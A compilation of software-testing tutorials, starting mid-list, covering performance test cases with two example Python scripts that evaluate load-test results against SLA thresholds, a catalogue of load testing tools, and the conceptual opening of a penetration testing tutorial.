Execute and monitor the tests.

Analyze Results, Report, and Retest:
Consolidate, analyze and share the test results. Fine-tune and retest to see if there is an improvement in performance. When all of the metric values are within acceptable limits, you have finished testing that particular scenario on that particular configuration.

Example of Performance Test Cases
Writing test cases for performance testing requires a different mindset compared to writing functional test cases.

Read more: How To Write Functional Test Cases.

• To verify whether an application is capable of handling a certain number of simultaneous users
• To verify whether the response time of an application under load is within an acceptable range when the network connectivity is slow
• To verify the response time of an application under low, normal, moderate and heavy load conditions
• To check whether the server remains functional without any crash under high load
• To verify whether an application reverts to normal behavior after a peak load
• To verify database server and CPU and memory usage of the application under peak load
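The acceptance criteria, the user ramp and the break threshold from the process and the comparison table above, carried through as an added example (not code from the tutorial or from any load testing tool). The criteria values, the ramp steps and the constructed_samples model that stands in for measured data are assumptions made for the example.

```python
"""Evaluating a user ramp against performance acceptance criteria.

Added example, not the tutorial's or any tool's code. Each ramp step holds a
fixed number of virtual users and yields (response_time_ms, ok) samples such
as a load tool would report. The evaluator computes the p95 response time,
throughput and error rate per step, checks them against the acceptance
criteria chosen in the planning step, and locates the break threshold: the
last passing step is the capacity, the first failing step is where stress
behaviour begins. The samples are constructed by a simple model, not measured.
"""
import math
from dataclasses import dataclass
from typing import List, Optional, Sequence, Tuple

Sample = Tuple[float, bool]  # (response time in ms, request succeeded)


@dataclass(frozen=True)
class Criteria:
    max_p95_ms: float      # response-time goal (the user concern)
    max_error_rate: float  # fraction of failed requests tolerated


@dataclass(frozen=True)
class StepSummary:
    users: int
    p95_ms: float
    throughput_rps: float  # reported for the business concern, not a pass/fail gate here
    error_rate: float


def percentile(values: Sequence[float], pct: float) -> float:
    """Nearest-rank percentile for 0 < pct <= 100 (p95 is what SLAs usually quote)."""
    if not values:
        raise ValueError("no samples")
    ordered = sorted(values)
    rank = max(1, math.ceil(pct / 100 * len(ordered)))
    return ordered[rank - 1]


def summarize(users: int, samples: Sequence[Sample], duration_s: float) -> StepSummary:
    """Reduce one step's samples to the metrics the criteria talk about."""
    times = [t for t, _ in samples]
    failures = sum(1 for _, ok in samples if not ok)
    return StepSummary(users, percentile(times, 95), len(samples) / duration_s,
                       failures / len(samples))


def passes(step: StepSummary, criteria: Criteria) -> bool:
    return step.p95_ms <= criteria.max_p95_ms and step.error_rate <= criteria.max_error_rate


def break_threshold(steps: Sequence[StepSummary],
                    criteria: Criteria) -> Tuple[Optional[int], Optional[int]]:
    """(capacity, first_failing_users): highest passing user count before the first failure."""
    capacity = None
    for step in sorted(steps, key=lambda s: s.users):
        if not passes(step, criteria):
            return capacity, step.users
        capacity = step.users
    return capacity, None


def constructed_samples(users: int) -> List[Sample]:
    """Constructed stand-in for measured data (an assumption, not a real system):
    response time grows with concurrency and 10% of requests fail past 150 users."""
    samples = []
    for i in range(4 * users):  # more users, more requests in the same window
        latency_ms = 120 + 1.5 * users + (i % 20) * 4  # spread of 0..76 ms per step
        ok = not (users > 150 and i % 10 == 0)
        samples.append((latency_ms, ok))
    return samples


def run_ramp(user_levels: Sequence[int], duration_s: float = 60.0) -> List[StepSummary]:
    """One summary per ramp step, using the constructed samples above."""
    return [summarize(u, constructed_samples(u), duration_s) for u in user_levels]


# Assumed acceptance criteria: p95 under 450 ms, at most 1% errors.
CRITERIA = Criteria(max_p95_ms=450.0, max_error_rate=0.01)
RAMP = [25, 50, 100, 150, 200, 300]

if __name__ == "__main__":
    steps = run_ramp(RAMP)
    for s in steps:
        print(f"{s.users:>4} users: p95={s.p95_ms:.0f} ms  {s.throughput_rps:.1f} rps  "
              f"errors={s.error_rate:.1%}  {'PASS' if passes(s, CRITERIA) else 'FAIL'}")
    capacity, first_fail = break_threshold(steps, CRITERIA)
    print(f"capacity={capacity} users, stress behaviour from {first_fail} users")
```

With real measurements, replace constructed_samples with the per-request results exported by your load tool; the evaluation logic stays the same.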
How to choose the right Performance Testing Tool
There are many tools in the market to do performance testing. It is impossible to name the best performance testing tool out of all the tools available, because every company has its own needs. What's perfect for one company may not be suitable for another. We have to do some analysis before choosing the right tool.

Some factors to consider when choosing the best performance testing tool:
• Budget (license cost)
• Types of license
• Protocol support
• Customer preference of load testing tool
• The cost involved in training employees on the selected tool
• Hardware/software requirements of the load testing tool
• Tool vendor support and update policy

What are some popular Performance Testing Tools to do Performance Testing?
There are a lot of performance testing tools in the market. There are free website load testing tools, paid tools and freemium tools. Almost all the commercial performance testing tools have a free trial, so you can get a chance to work hands-on before deciding which is the best tool for your needs.

Some of the popular performance testing tools are LoadRunner, Apache JMeter, NeoLoad, StresStimulus, LoadUI Pro, WebLOAD, Rational Performance Tester, AppLoader, SmartMeter.io, Silk Performer, StormRunner Load and LoadView.

View our full list of Popular Performance Testing Tools.


Conclusion:
In this article, we have covered most of the information required to
understand Performance testing. If you have any queries, please
comment in the comment section below.


Performance Testing Tools (Load Testing Tools) in 2020
In this post, we learn the most popular Performance Testing Tools (aka
Load Testing Tools). We all know it’s hard to imagine today’s world without
the internet. Websites help us connect with people, provide stores for online
purchases, and bring news stories anytime from anywhere in the world. We can
access these websites from any computer or mobile device. For an online
business to be successful, it has to be available without long wait times,
delays, errors, or service interruptions. Websites must be able to handle a
sudden increase in traffic without compromising the user experience. It is
important to measure application performance in peak traffic and under
extreme stress conditions.

In this article, we will be looking into the following

• What is Performance Testing
• How to choose the right Performance Testing Tool
• Popular Performance/Load Testing Tools
• 1. WebLOAD
• 2. LoadRunner
• 3. Apache JMeter
• 4. NeoLoad
• 5. StresStimulus
• 6. LoadUI Pro
• 7. Rational Performance Tester
• 8. AppLoader
• 9. SmartMeter.io
• 10. Silk Performer
• 11. StormRunner Load
• 12. LoadView
• Some other Performance/Load Testing Tools
What is Performance Testing
Performance testing determines or validates the speed, scalability,
and/or stability characteristics of the system or application under
test. Performance is concerned with achieving response times,
throughput, and resource-utilization levels that meet the performance
objectives for the project or product.

Performance testing and types of performance testing such as Load
Testing, Volume Testing, Stress Testing, Capacity Testing,
Soak/Endurance Testing, and Spike Testing come under Non-
functional Testing.

Read more on Performance Testing


In the current market, the performance of an application plays a vital
role. We conduct performance testing to address the bottlenecks of
the system and to fine-tune the system by finding the root cause of
performance issues. Performance testing answers questions such as
how many users the system can handle, how well the system
recovers when the number of users exceeds the supported maximum,
and what the response time of the system is under normal and peak loads.

We use performance testing tools to measure the performance of a
system or application under test (AUT) and help in releasing high-
quality software.
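As an added example (not code from the tutorial or any of the tools it lists), the following Python script evaluates a stepped load-test run against an SLA and answers exactly those questions: the largest user count that stayed within the SLA and whether the system returned to normal after the peak. The request records and the SLA thresholds are constructed assumptions standing in for what a load tool would export.

```python
"""Evaluate stepped load-test results against an SLA.

Added example, not part of the original tutorial. The request records
below are constructed inline to stand in for what a tool such as JMeter
or LoadRunner would export; the SLA thresholds are assumptions.
"""
import math
from dataclasses import dataclass


@dataclass(frozen=True)
class Request:
    step: str          # load step name ("low", "normal", "peak", ...)
    users: int         # concurrent virtual users during that step
    latency_ms: float  # end-to-end response time of this request
    ok: bool           # False for an error response or a timeout


@dataclass(frozen=True)
class Sla:
    p95_ms: float          # 95th-percentile response time must not exceed this
    max_error_rate: float  # fraction of failed requests tolerated


def percentile(values, pct):
    """Nearest-rank percentile: the value at rank ceil(pct * n / 100)."""
    if not values:
        raise ValueError("no samples")
    ordered = sorted(values)
    rank = max(1, math.ceil(pct * len(ordered) / 100))
    return ordered[rank - 1]


def summarise(requests):
    """Per-step user count, p95 latency and error rate, in order of appearance."""
    steps = {}
    for r in requests:
        steps.setdefault(r.step, []).append(r)   # dicts keep insertion order
    rows = []
    for name, rs in steps.items():
        rows.append({
            "step": name,
            "users": rs[0].users,
            "p95_ms": percentile([r.latency_ms for r in rs], 95),
            "error_rate": sum(1 for r in rs if not r.ok) / len(rs),
        })
    return rows


def meets_sla(row, sla):
    return row["p95_ms"] <= sla.p95_ms and row["error_rate"] <= sla.max_error_rate


def max_supported_users(rows, sla):
    """Largest user count reached before the first step that breached the SLA."""
    best = 0
    for row in rows:
        if not meets_sla(row, sla):
            break
        best = max(best, row["users"])
    return best


def recovered_after_peak(rows, sla):
    """Does the first step after the highest-load step meet the SLA again?"""
    peak_idx = max(range(len(rows)), key=lambda i: rows[i]["users"])
    after = rows[peak_idx + 1:]
    return bool(after) and meets_sla(after[0], sla)


def make_step(name, users, base_ms, failures=0, n=20):
    """Constructed samples: latencies base_ms .. base_ms+95 in 5 ms steps."""
    return [Request(name, users, base_ms + 5 * i, ok=i >= failures) for i in range(n)]


# Constructed run: ramp low -> normal -> moderate -> heavy -> peak, then back down.
SAMPLE_RUN = (
    make_step("low", 10, 100)
    + make_step("normal", 50, 200)
    + make_step("moderate", 100, 350)
    + make_step("heavy", 200, 600)
    + make_step("peak", 400, 1200, failures=3)   # server errors under peak load
    + make_step("recovery", 50, 210)
)
SAMPLE_SLA = Sla(p95_ms=800, max_error_rate=0.01)


def analyse(requests=SAMPLE_RUN, sla=SAMPLE_SLA):
    rows = summarise(requests)
    return {
        "rows": rows,
        "max_supported_users": max_supported_users(rows, sla),
        "recovered_after_peak": recovered_after_peak(rows, sla),
    }


if __name__ == "__main__":
    result = analyse()
    for row in result["rows"]:
        verdict = "PASS" if meets_sla(row, SAMPLE_SLA) else "FAIL"
        print(f"{row['step']:>9} {row['users']:>4} users  p95={row['p95_ms']:>7.1f} ms  "
              f"errors={row['error_rate']:.1%}  {verdict}")
    print("max users within SLA:", result["max_supported_users"])
    print("recovered after peak:", result["recovered_after_peak"])
```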

How to choose the right Performance Testing Tool

There are many tools in the market to do performance testing. It is
impossible to single out the best performance testing tool of all the
tools available, because every company has its own needs.
What’s perfect for one company may not be suitable for another
company. We have to do some analysis before choosing the right tool.
Here are some factors we have to consider when choosing the best
performance testing tool.

Some factors to consider when choosing the best performance testing
tool:

• Budget (License cost)
• Types of license
• Protocol support
• Customer preference of load testing tool
• Cost involved in training employees on the selected tool
• Hardware/Software requirements of the load testing tool
• Tool vendor support and update policy
Popular Performance Testing Tools (Load Testing Tools)
There are a lot of performance testing tools in the market. There are
free website load testing tools, paid tools and freemium tools. Here we
have included both open source performance testing tools and
commercial performance testing tools. Almost all the commercial
performance testing tools have a free trial. You can get a chance to
work hands-on before deciding which is the best tool for your needs.
Performance testing plays a vital role in ensuring that the performance
of the released software meets the agreed SLA (Service Level Agreement).

Performance testing tools let you perform extensive performance
testing and make sure your site won’t slow down or crash when
business is booming.

Performance issues are a problem almost every industry (Banking,
eCommerce, Airlines, Retail, Restaurants, etc.) faces in common.

We are trying to bring you a comprehensive list of popular performance
testing tools for measuring web application performance and load
stress capacity.

1. WebLOAD

WebLOAD is an enterprise-grade load and performance testing tool
which is designed for web applications. It supports over a hundred
technologies from web protocols to enterprise applications and has
built-in integration with Jenkins, Selenium and many other tools to
enable continuous load testing for DevOps. It combines performance,
scalability, and integrity as a single process for the verification
of web and mobile applications. It can simulate hundreds of thousands
of concurrent users, making it possible to test large loads and report
bottlenecks, constraints, and weak points within an application. The
results of the tests are collected from the Load Machines and can be
viewed in real-time in a tabular or graphical format. It is compatible
with operating systems like Microsoft Windows and Linux.
WebLOAD Features:
Following are some of the most important features of WebLOAD

• WebLOAD can be run as an on-premise product or as a fully
managed SaaS load testing solution.
• A set of predefined analysis reports provides performance data,
helping users identify bottlenecks. Reports and analysis data
can also be viewed remotely via a customizable Web
Dashboard.
• It supports a wide range of web, mobile, and enterprise
protocols and technologies.
• A powerful correlation engine recognizes both server-side and
client-side dynamic values.
Protocols:
Protocols and technologies supported by WebLOAD are as follows.

It supports a wide range of web, mobile, and enterprise protocols and
technologies such as HTTP/HTTPS, WebSocket, PUSH, AJAX,
SOAP, HTML5, WebDAV and many others.
Download Link: WebLOAD
2. LoadRunner (HP Performance Tester)
LoadRunner is load testing software from Micro Focus for
application load testing. As a performance testing tool, it is used to test
applications, measuring system behavior and performance under
load. It can create and handle thousands of concurrent users to put
the application through the rigors of real-life user loads while gathering
the required information about performance and about the
infrastructure components (web servers, database servers,
etc.). It reports the end user response times for business processes
and transactions to compare them against the service level
agreements (SLA). The results can then be analyzed in detail to
explore the reasons for a particular behavior. It is compatible with
operating systems like Microsoft Windows and Linux.

LoadRunner Features:
Following are some of the most important features of LoadRunner

• It supports performance testing of the latest technologies as well
as legacy applications.
• Supports both browser-based and native mobile application
tests using advanced network behavior and service
virtualization
• Integrates load testing into your development tools: IDE, jUnit,
nUnit, Jenkins, Selenium and Microsoft Visual Studio
• It identifies performance bottlenecks in real-time by using integrated
performance monitors that leverage application-
layer and code-level data for root cause analysis and analytics
Protocols:
Protocols and technologies supported by LoadRunner are as follows.

LoadRunner supports performance testing for more than 50
application environments and protocols, including
Ajax, Flex, HTML 5, Microsoft Silverlight, HTTP/2, MQTT, Web,
SOAP, ERP, Web services, GWT, RDP, Database, Terminal, Citrix,
Java, .NET, Oracle, and SAP. It supports the latest application
technologies as well as the legacy ones.
Download link: LoadRunner
3. Apache JMeter
Apache JMeter is a free and open source load testing tool written
in Java. It was originally designed for testing web
applications, but its scope has since expanded. It is designed for
load testing and for analyzing and measuring the performance of a
variety of services. It can be used to test performance of both static
and dynamic resources such as dynamic web applications. It is useful to
simulate a heavy load on a server, group of servers or network to review
the performance of an application under different load conditions. It
works on Linux, Windows & Mac OS X.

Apache JMeter Features:

Following are some of the most important features of JMeter

• It is free open source software
• It comes with a simple and intuitive GUI.
• It is a platform independent tool. It is written and developed
using Java. It can run on any environment which accepts a JVM
(Java Virtual Machine).
• It is highly extensible and supports different server types.
• Its full multi-threading framework allows concurrent sampling by
many threads and simultaneous sampling of different functions
by separate thread groups.
• A complete and ready-to-present dynamic HTML report
• Easy correlation through the ability to extract data from the most
popular response formats: HTML, JSON, XML or any textual
format
• It supports multiple protocols
Protocols & Technologies:
Protocols supported by JMeter are as follows.

• Web – HTTP, HTTPS (Java, NodeJS, PHP, ASP.NET, etc.)
• Web Services – SOAP/REST
• FTP Service
• Database via JDBC drivers
• LDAP directory
• Mail Services – SMTP, POP3, IMAP
• Messaging-oriented middleware (MOM) via JMS
• Native command or shell scripts
• TCP
• Java objects
Download Link: JMeter
4. NeoLoad
NeoLoad is a powerful load and performance testing software solution
designed for web and mobile applications. It simulates a large number
of users and analyses server behavior. It identifies performance
bottlenecks and provides a solution to optimize the design and
development of the application before they become expensive issues
in production. It allows users to conduct load tests quickly, efficiently,
and frequently. This means you can confidently deploy high-
performance internet, intranet or mobile applications regardless of
the technologies used. It even supports the newest technologies such as
Flex, Silverlight, GWT, SPDY, JSON, and AJAX Push. It integrates
with Continuous Delivery platforms. It is compatible with operating
systems like Microsoft Windows, Linux, and Solaris.

NeoLoad Features:
Following are some of the most important features of NeoLoad

• It supports the latest technologies like HTML5, Push, WebSocket,
AngularJS, Oracle Forms and many more
• Scriptless design and visual programming
• Integration with Continuous Integration servers. It provides an
out-of-the-box CI plugin for Jenkins, TeamCity, Bamboo,
XebiaLabs XL Release.
• Native GIT support
• It integrates with functional testing tools like Selenium, Appium,
Perfecto MobileCloud etc.
Protocols:

Protocols and technologies supported by NeoLoad are as follows.

SAP GUI Web, HTTP, HTTPS, WebSocket, SOAP, REST, Silverlight,
Java Serialization, Java Message Service, GWT, AJAX, Oracle
Forms, Push technologies, etc.

Download Link: NeoLoad


5. StresStimulus
StresStimulus is a load testing tool for web applications, mobile, and
enterprise apps. It determines the web performance and scalability of
an application under the rigors of heavy traffic load. It collects real-
time server monitoring information to pinpoint application performance
bottlenecks and isolate web speed issues. It supports a native app
framework which saves time on mobile app load testing. It records
user actions and replays them in order to emulate variable usage
patterns. It also monitors the impact of load on application responsiveness
and server infrastructure. It automatically fixes playback errors. It
comes with both free and commercial versions. You can get a 7-day
extendable trial with up to 10k virtual users and full support in the free
trial.

StresStimulus Features:
Following are some of the most important features of StresStimulus

• It can be used on-premises or from the cloud.
• It works with or without Fiddler. Fiddler helps to create, analyze
and debug HTTP traffic.
• Scripting is not required but is available. We can create the
entire test case through a GUI and wizard-based interface
without touching a script.
• Multiple secure authentication methods are supported, including
Web Forms, Basic, NTLM, and Kerberos.
• It supports parameterization with external data (CSV files)
• It gives in-depth reporting. It generates a test summary report
that presents key performance metrics.
Protocols:
Protocols and technologies supported by StresStimulus are as follows.

HTTP, HTTPS, AJAX, SOAP, WCF, binary WCF, and XML over
HTTP.
Download Link: StresStimulus
6. LoadUI Pro
LoadUI Pro by Smartbear is a load testing tool for REST & SOAP
APIs, Databases, and Microservices. It runs on Windows, Linux and
Mac OS. It allows users to create scriptless yet sophisticated load
tests in the shortest time. It allows users to test the speed and
scalability of APIs, preview API performance behaviors before
releasing to production environments and shift performance insights to
the left. Users can access detailed reports and automate load tests on
Bamboo, Jenkins, TFS, and other automation frameworks.
Additionally, SoapUI functional tests can be quickly converted into
load tests using LoadUI Pro without writing a single line of script.

LoadUI Pro Features:

Following are some of the most important features of LoadUI Pro
• Cloud-based API load tests
• Scriptless load test creation
• Reuse existing functional tests without modifying the original
tests
• Parallel API load testing
• Server monitoring gives visibility into how servers respond to
traffic
Protocols:
Protocols and technologies supported by LoadUI Pro are as follows

HTTP, REST, SOAP, JSON, JMS, JSON Schema, XML Schema,
WSDL etc.

Download Link: LoadUI Pro


7. Rational Performance Tester
IBM Rational Performance Tester (RPT) is a performance and load
testing tool that identifies the presence and cause of system
performance bottlenecks. It allows the development team to validate
the scalability and reliability of web-based applications before
deployment into a production environment.
It can be used for both web-based applications and server-based
applications. It identifies and rectifies leakages in the websites and the
servers. It is compatible with operating systems such as AIX, Mac OS
X, and Microsoft Windows.

Rational Performance Tester Features:

Following are some of the most important features of Rational
Performance Tester

• Offers real-time reporting for immediate awareness of
performance problems at any time during a test.
• Root cause analysis helps to identify both the source code and
physical application tier that are causing the bottleneck.
• Supports load testing against applications such as HTTP, SAP,
Siebel, SIP, TCP Socket, Citrix
• Offers emulation of user populations while minimizing the
memory and processor footprint
• Automates test data variation and enables insertion of custom
Java code
Protocols:
Protocols and technologies supported by Rational Performance Tester
are as follows.
HTTP, Citrix, SOA, SOP, Socket Recording etc.

Download Link: http://www.ibm.com/developerworks/downloads/r/rpt/


8. AppLoader
AppLoader is a load testing tool for verifying the readiness of an
application. It allows you to test any application by reproducing the
same user experience from all your access points: thin clients, fat clients,
and web portals. It tests any business application that is accessed
through thin clients, fat clients and web portals. The entire business flow can be
tested, including all third-party apps, without adding plugins or writing
a single line of code. It is compatible with all versions of Citrix, cloud-
based & hybrid infrastructures, EHR systems, and custom apps.

AppLoader Features:
Following are some of the most important features of AppLoader

• It supports Citrix, PeopleSoft, Java, .NET, Adobe, client-server,
Oracle, Siebel, SAP, web, custom apps etc.
• It is protocol independent
• Load test any application, in any environment
• Simulate user actions on any kind of application for any number
of users.
• Build any scenario without scripting (including mouse events,
keyboard inputs, if conditions, etc.), and replay these actions
automatically.
Protocols:
AppLoader is protocol independent
Download Link: https://www.nrgglobal.com/apploader-performance-
testing-download
9. SmartMeter.io
SmartMeter.io is a multi-platform load and performance testing tool. It
features fast and easy test creation and execution, test management
and generating of test reports with a focus on testing in a distributed
mode. It is based on Apache JMeter but adds new features such as
one-click test reports, advanced scenario recorder, acceptance
criteria, and others. It is compatible with operating systems such as
Linux, Mac OS, and Microsoft Windows.
SmartMeter.io Features:
Following are some of the most important features of SmartMeter.io

• Scriptless test recording
• It fits very well into a continuous integration process
• Automatically generated test reports with test details and results
• Real-time test results on multiple monitors
• Combine load tests with Selenium
Protocols:
Protocols and technologies supported by SmartMeter.io are as
follows.
HTTP, HTTPS, FTP, JDBC, LDAP, SOAP, and JMS

Download Link: https://www.smartmeter.io/download


10. Silk Performer
Silk Performer is a load and stress testing tool for optimizing business
application performance from Micro Focus. It has the ability to test
multiple application environments with thousands of concurrent users.
Silk Performer can considerably speed up testing cycles by allowing
you to reuse your existing functional tests (Silk Test or Selenium) for
performance testing and synthetic monitoring purposes as well. It also
supports the widest range of protocols.
Silk Performer Features:
Following are some of the most important features of Silk Performer

• Re-use functional test assets for performance testing and
monitoring
• Cloud integration and unlimited scalability from the cloud
• Supports server monitoring, reporting, and analysis
• It provides extensive support for mobile web and native
applications, with profiles for all popular mobile devices,
application types and connection speeds.
Protocols:
Protocols and technologies supported by Silk Performer are as
follows.

HTTP(S)/HTML, HTTP/2, IPv6, Ajax, Silverlight, mobile devices, Java
over HTTP, HTTP Live Streaming (HLS), Adobe Flex/AMF3, Granite
DS Flex, Unicode (UTF-8), SOAP (XML), FTP, LDAP, MAPI, IMAP,
SMTP/POP, SSL, CORBA (IIOP), Java RMI (EJB/J2EE), .NET
Remoting, Oracle Forms, Citrix, VMWare Horizon View, ODBC,
Oracle Call Interface (OCI), DB2 CLI, TCP/IP, UDP, Tuxedo ATMI,
Jolt, TN3270E, TN5250, T100/200+, and UI-Level (Silk Test,
Selenium)

Download Link: https://www.microfocus.com/products/silk-
portfolio/silk-performer/
11. StormRunner Load
StormRunner Load from Micro Focus is a cloud-based
load and performance testing tool for web and mobile apps. It helps users
to detect performance issues and ensure that a mobile or web
application is ready for the load. It reduces the overall time of a
performance testing engagement and is best suited for applications
developed in an agile process. It compares the current test results with the
previous results to see whether the current build is better than the previous
one.

StormRunner Load Features:

Following are some of the most important features of StormRunner
Load

• Comparison of current test results with the previous results
• Supports Web, Web Services, SAP Web and JMeter scripts
• Integrating performance testing in the CI/CD process
• It integrates with monitoring tools like SiteScope
• Configure the host file in the cloud images by uploading them as
part of the script
Download Link: https://www.microfocus.com/en-
us/products/stormrunner-load-agile-cloud-testing/free-trial
12. LoadView
LoadView is a cloud-based SaaS (Software as a Service) performance
testing tool that uses real browsers to run a performance test on
websites, and web applications. It allows users to record test scripts
via point and click. The test results are made available as real-time
online graphs. These reports include troubleshooting and analysis
tools that help users find and fix the bottlenecks. It can be used for
both load testing and stress testing. It supports a wide range of mobile
browsers and devices including iPhones, iPads, BlackBerry phones,
Android smartphones and tablets, Google devices, Nokia phones,
Amazon Kindles, and other mobile handsets and tablets.

LoadView Features:
Following are some of the most important features of LoadView
• Advanced load testing features include point and click scripting,
real browser testing, and global cloud-based infrastructure
• It is a fully managed cloud. No need to manage your own 3rd
party cloud accounts.
• Instantly spin up test machines with the most reliable cloud
platforms including Google, Amazon, and Rackspace.
• More accurate than the headless browser PhantomJS and
Selenium IDE
• Browsers such as Chrome, IE, Android, and iOS browsers show
the actual performance of your website under load in real
browsers.
• Advanced scripting in over 40 desktop and mobile browsers.
• There is virtually no limit to the number of users that can be
generated for a load test
Download Link: http://www.loadview-testing.com/
Some other Performance Testing Tools are as follows:
There are a lot of performance & load testing tools and software in
the market, so we are including some other load testing tools in
this list.

13. TestPlant: https://eggplant.io/
14. Soasta’s CloudTest: https://www.akamai.com/
15. Taurus: https://gettaurus.org/
16. Siege: https://www.joedog.org/siege-home/
17. Gatling: https://gatling.io/
18. LoadComplete: https://smartbear.com/product/loadcomplete/free-
tool
19. The Grinder: http://grinder.sourceforge.net/
20. BlazeMeter: https://www.blazemeter.com/
21. Loadster: http://www.loadsterperformance.com/loadster/free
22. Tricentis Flood: https://flood.io/load-performance-testing-tool/free-
load-testing-trial/
23. WAPT: http://www.loadtestingtool.com/wapt.exe
24. LoadImpact: http://loadimpact.com/
25. Appvance: http://www.appvance.com/trial/
26. Apica LoadTest: https://www.apicasystems.com/load-testing
27. QEngine (ManageEngine): http://www.manageengine.com/products/qengine/
28. Loadstorm: http://loadstorm.com/
29. Httperf: http://www.hpl.hp.com/research/linux/httperf/download.php
30. OpenSTA: http://opensta.org/download.html
Conclusion:
We have learned that performance testing tools or load testing
tools help us to eliminate performance bottlenecks and plan for the
resources required to ensure high-performing
applications. Here we listed popular performance testing tools (both
open source and commercial). Let us know your favorite performance
testing tool in the comments below. If you feel I forgot to mention any of
your favorite tools, let us know in the comments below. We will try to
include it in this list and update this post.

Penetration Testing Tutorial | Software Testing Material
In this penetration testing tutorial (pen test tutorial), we are going to learn the
following:

• 1. What is Penetration Testing
• 2. Why is Penetration Testing necessary
• 3. How often to conduct pen testing
• 4. What are the phases of Penetration Testing
• 5. What are the root causes of Security Vulnerabilities
• 6. What is the difference between Penetration Testing & Vulnerability
Scanning
• 7. Who Performs Pen-testing
• 8. Role and Responsibilities of Penetration Testers
• 9. Types of Penetration Testers
• 10. What is the difference between Black, White and Grey hat hackers
• 11. What are the types of Penetration Tests
• 12. What are the Types of Pen Testing
• 13. Limitations of Penetration Testing
• 14. Penetration Testing Tools
• 15. How to choose a Penetration Testing Tool
Let’s dive in further to learn Penetration testing without further delay.

What is Penetration Testing?

Penetration testing is a type of Security testing which is
performed to evaluate the security of a system (hardware, software,
networks or an information system environment). The goal of this
testing is to find all the security vulnerabilities that are present in an
application by evaluating the security of the system with the techniques
an attacker would use, in order to protect the data from attackers and
maintain the functionality of the system. It is a type of Non-functional
testing which makes authorized attempts to violate the security of the
system. It is also known as Pen Testing or Pen Test, and the tester
who does this testing is a penetration tester, aka ethical hacker.

Why is Penetration Testing necessary?

If a system is not secured, then an attacker can gain unauthorized
access to the system. Penetration testing evaluates the security of a
system and helps protect it against internal and external threats. It identifies
the vulnerabilities and determines whether unauthorized access or
other malicious activity is possible.

Organizations conduct penetration testing for a number of reasons

1. To prevent data breaches
2. To check security controls
3. To meet compliance requirements
4. To ensure the security of new applications
5. To assess incident detection and response effectiveness
How often to conduct pen testing?
Cyber-attacks are frequent these days. It is very important to
conduct regular vulnerability scans and penetration testing to detect
recently discovered and previously unknown vulnerabilities.

The frequency of pen testing should depend on your
organization’s security policy. However, conducting pen testing
regularly can reveal the weaknesses of your system and keep it
away from security breaches.

Usually, pen testing is done after the deployment of new infrastructure
and applications. It is also done after major changes to infrastructure
and applications.

Vulnerability scanning examines the servers for vulnerabilities. We
have to make sure the vulnerabilities found are not false positives;
reporting false positives is a known downside of vulnerability
scanning.
Penetration testing examines the servers for vulnerabilities and
exploits them.

Both vulnerability scanning and penetration testing can test an
organization’s ability to detect security breaches. Organizations need
to scan both the external and internal infrastructure and applications to
protect against external and internal threats.

Organizations have to conduct regular penetration testing for the
following reasons:

• To find security vulnerabilities in a system
• To secure user data
• To test applications that are often the avenues of attack
• To identify new bugs in an existing system after deployment or
after major changes to the system
• To prevent black hat attacks and guard the user data
• To control revenue loss
• To improve the existing security standards
What are the phases of Penetration Testing?
The process of penetration testing can be divided into five phases,
which are as follows:

1. Planning phase
In this phase, we define the scope (which system to test and the goals
and objectives to achieve with the penetration test) and the resources
and the tools (vulnerability scanners or penetration testing tools) to
employ for test execution.
2. Discovery phase
In this phase, we collect as much information as possible about the
systems that are in the scope of the penetration test.

3. Vulnerability assessment
In vulnerability assessment, we just identify and report the vulnerabilities
using vulnerability scanning tools.

4. Exploitation phase
In this phase, we try to exploit the vulnerabilities identified in the
previous phases (discovery and vulnerability assessment) to gain
access to the target system.

5. Reporting phase
In this phase, we document all the results and findings in an effective
manner. This report will be used as a reference document during the
mitigation activities that address the identified vulnerabilities.

What are the root causes of Security Vulnerabilities?

Some of the root causes of Security Vulnerabilities are as follows

Complexity:
Security vulnerabilities rise in proportion to the complexity of a system.
Complexity in terms of software, hardware, information, businesses,
and processes introduces more security vulnerabilities.

Connectivity:
Every unsecured connection is a potential avenue for exploitation.

Design Flaws:
There shouldn’t be any design bugs in software and hardware. These
bugs can expose businesses to significant risks.
Configuration:
Poor system configuration introduces security vulnerabilities.

User Input:
Untrusted input, such as SQL injection payloads or data that triggers
buffer overflows, can be crafted to attack the receiving system.
Management:
Management should have a proper risk management plan to avoid
security vulnerabilities in the system.

Passwords:
Passwords are there to prevent unauthorized access and secure your
personal data. Insecure password habits (sharing them with others, writing
them down somewhere, choosing easy-to-guess values) allow attackers to
guess your password easily.
Lack of training:
Lack of training leads to human errors. Human errors can be
prevented by giving proper training to the employees.

Human errors:
Human errors such as improper disposal of documents, coding errors,
and giving out passwords to phishing sites are a significant source of
security vulnerabilities.

Communication:
Communication channels such as telephone, mobile, and internet give
scope for security vulnerabilities.

Social:
Employees disclosing sensitive information to outsiders is one of the
common reasons for security threats.

What is the difference between Penetration Testing &


Vulnerability Scanning?
Before looking into the difference between penetration testing and
vulnerability scanning. Let’s see two most used terms such as
vulnerability and exploit.

What is a Vulnerability?
A vulnerability is a security weakness or flaw which can be exploited
by an attacker, to perform unauthorized actions within a system.

What Is An Exploit?
An exploit is code, a sequence of commands or a technique that takes
advantage of a vulnerability to cause unintended behaviour on a system,
typically in order to gain access to or control of that system.

Now let’s see the difference between Penetration testing and
vulnerability assessment.

There is some confusion in the industry about the difference between
Penetration Testing & Vulnerability Scanning. Although the two terms
are often used interchangeably, they are not the same thing:
penetration testing is not the same as vulnerability testing.

Vulnerability Scanning:
In vulnerability scanning (also called vulnerability assessment), we
identify and report weaknesses using vulnerability scanning tools,
without attempting to exploit them.

It’s the first step to improve the security of a system.

A vulnerability assessment report should contain the title, the
description and the severity of each finding, and ideally the affected
host or component and a remediation recommendation.

Penetration Testing:
In Penetration testing (aka Pen test), we identify the vulnerabilities and
attempt to exploit them, using penetration testing tools and manual
techniques, to show what an attacker could actually achieve. The tests
are repeated after fixes until the system no longer yields to them.
A penetration testing report lists the vulnerabilities that were
exploited successfully, how they were chained, and what access or data
was obtained.

If an organization is interested in protecting their system from security
issues then they should carry out vulnerability assessment and
penetration testing on a regular basis.

Pen testing can be divided into three techniques: manual penetration
testing, automated penetration testing, and a combination of both.

Automated penetration testing tools cannot find all vulnerabilities.
Some vulnerabilities, such as business-logic flaws and authorization
bypasses, can only be identified manually. So experienced pen testers
use their experience and skills to attack a system with manual
penetration testing on top of the automated scans.

Who Performs Pen-testing?

Pen-testing can be performed by Testers or Network Specialists or
Security Consultants.

Role and Responsibilities of Penetration Testers:

Responsibilities of penetration testers vary from company to company.
However, there are several core responsibilities common to all pen
testers, such as

